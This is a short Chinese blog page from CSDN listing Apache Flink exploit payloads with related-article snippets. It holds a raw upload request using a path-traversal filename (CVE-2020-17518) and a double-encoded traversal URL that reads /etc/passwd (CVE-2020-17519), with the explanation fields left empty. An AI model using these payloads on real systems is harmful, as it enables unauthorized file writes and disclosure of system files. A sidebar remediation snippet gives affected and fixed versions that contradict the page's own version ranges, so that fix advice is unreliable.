flink漏洞合集

最新推荐文章于 2024-02-23 14:54:58 发布
最新推荐文章于 2024-02-23 14:54:58 发布
阅读量314 收藏
点赞数 1
文章标签: flink 大数据 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/131500351
版权

1.apache flink文件上传漏洞(CVE-2020-17518)-------未复现出来
        操作技巧:
            POST /jars/upload HTTP/1.1
            Host: 192.168.110.129:8081
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: application/json, text/plain, */*
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Connection: close
            Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
            Content-Length: 214

            ------WebKitFormBoundaryoZ8meKnrrso89R6Y
            Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success.jar"
            Content-Type: text/plain

            111111
            ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
        漏洞原理:
        漏洞版本:Apache Flink 1.5.1 ~ 1.11.2
    2.apache flink目录遍历(CVE-2020-17519)
        操作技巧:
            http://192.168.110.129:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpa
            sswd
        漏洞原理:
        漏洞版本:Apache Flink 1.11.0-1.11.2

!QK
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
flink-1.12.7.zip
12-16
flink-1.12.7-rc1 修复log4j的的漏洞版本
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
使用方法&免责声明 该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、1.11.2 工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_50854662的博客
05-22 1146
Apache Flink 文件上传漏洞 (CVE-2020-17518)
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞代码分析
SmileAssassn的博客
01-30 867
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞代码分析
Apache Flink 目录遍历漏洞 CVE-2020-17519
m0_54323635的博客
08-31 397
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519,漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
SmileAssassn的博客
01-08 524
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
Apache Flink 高危漏洞.pdf
12-10
不错的资源哦!
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 未授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 ...
flinksql做近实时特征处理的坑
mtj66的博客,交流WX:SpringBreeze1104
12-10 3796
flinksql做近实时特征处理的坑,以及解决方案。
Apache Flink 文件上传漏洞(CVE-2020-17518)
最新发布
weixin_53639243的博客
02-23 268
Apache Flink 是一个开源的流处理框架,具有强大的流处理和批处理能力。Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现
Senimo
07-28 1688
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞复现 1、环境搭建
Apache Flink (文件写入漏洞/文件读取漏洞​)CVE-2020-17518/CVE-2020-17519
thelostworld
01-15 396
​ Apache Flink (文件写入漏洞/文件读取漏洞) CVE-2020-17518/17519 一、漏洞描述 Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。 CVE-2020-17518: 文件写入漏洞 攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访..
Apache Flink -任意文件写入漏洞(CVE-2020-17518)
chaojixiaojingang
01-07 4033
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
apache flink目录遍历漏洞(CVE-2020-17518复现)
ANYOUZHEN的博客
06-04 1292
漏洞描述:apache Flink目录遍历漏洞,可通过REST API读/写远程文件影响版本:Flink 1.5.1-1.11.2接下来开始复现:我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出现了报错:8行,和上一篇文章出现了一样的问题,上网搜
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2505
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
Apache Flink漏洞(CVE-2020-17519)
小小猪的博客
12-30 1283
Apache Flink漏洞(CVE-2020-17519) 漏洞简介: Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 影响版本: 1.11.0、1.11.1、1.11.2 环境搭建: 在线环境 地址 漏洞复现: 访问首页 构造poc (url二次编码) /jobmanager/logs/..%252f..%252f..%252f
Apache Flink RCE 漏洞复现
Yanug
05-07 3122
0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01 漏洞概述 攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 0x02 影响版本 至目前最新版本Apache Flink 1...
apache flink文件上传漏洞修复
05-20
Apache Flink是一个分布式流处理框架,从版本1.0.0到1.4.0存在文件上传漏洞,攻击者可以通过该漏洞上传恶意文件并在服务器上执行任意代码,造成严重的安全风险。以下是修复该漏洞的步骤: 1.升级Apache Flink版本至1.4.1及以上版本,因为该版本已经修复了文件上传漏洞。 2.移除flink-runtime-web模块,因为该模块是漏洞的根源。可以通过修改pom.xml文件中的依赖关系来实现该操作。 3.禁用Flink的Web UI界面,因为该界面是攻击者上传恶意文件的入口。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #disable flink web ui web.submit.enable: false ``` 4.限制Flink集群的访问权限,防止未授权的用户上传恶意文件。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #set flink rest api host and port rest.address: 127.0.0.1 rest.port: 8081 #set flink jobmanager rpc address and port jobmanager.rpc.address: 127.0.0.1 jobmanager.rpc.port: 6123 ``` 以上是修复Apache Flink文件上传漏洞的步骤,建议尽快采取措施以保证系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值